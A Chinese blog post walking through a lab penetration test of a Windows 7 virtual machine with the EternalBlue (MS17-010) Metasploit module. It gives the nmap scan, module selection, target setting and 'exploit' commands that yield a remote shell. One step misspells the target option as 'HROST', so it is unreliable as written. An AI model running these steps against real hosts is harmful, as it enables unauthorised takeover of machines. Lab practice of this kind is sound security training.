基于MS17_010(永恒之蓝)的一次渗透测试

工具和环境:

  • Nmap端口扫描器
  • Metasploit漏洞检测工具
  • Kali Linux(前面的两样工具都在Kali Linux中有集成,是攻击机)
  • Windows 7(作为被攻击机,IP地址为:192.168.229.134)
  • VMware虚拟机

1. 打开Kali Linux的命令行输入框,在命令行中输入 "nmap -sV 192.168.229.134"扫描Windows7(被攻击机)开放的端口以及其余相关信息

扫描端口信息

2. 可以看到,被攻击机的 445 端口是开放的,由此可以判断可以基于MS17_010进行"永恒之蓝攻击"
3. 输入"msfconsole"进入 Metasploit 命令行操作

在这里插入图片描述

4. 输入 “search ms17_010” 搜索与该漏洞相关的代码库 (注:auxiliary开头的代码是辅助功能代码;exploit开头的是我们将要使用的渗透代码)

在这里插入图片描述

5. 输入 “use exploit/windows/smb/ms17_010_eternalblue” 调用该渗透代码

在这里插入图片描述

6. 输入 “show options” 查看该代码可以使用的参数,为后面设置某些参数做参考

在这里插入图片描述

7. 输入 "set HROST 192.168.229.134"设置攻击对象的IP地址,本实验中就是把该参数设为Windows 7的IP地址

在这里插入图片描述

8. 输入 “exploit”,就是把上面设置好参数的代码注入给被攻击机(Windows 7)进行渗透,最后可以获取到Windows 7的控制权,返回了Windows 7的shell界面,在上面可以进行命令行的操作,攻击成功

在这里插入图片描述
注:不同的主机攻击效果可能不同,本实验还有一种攻击结果是被攻击机蓝屏

  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值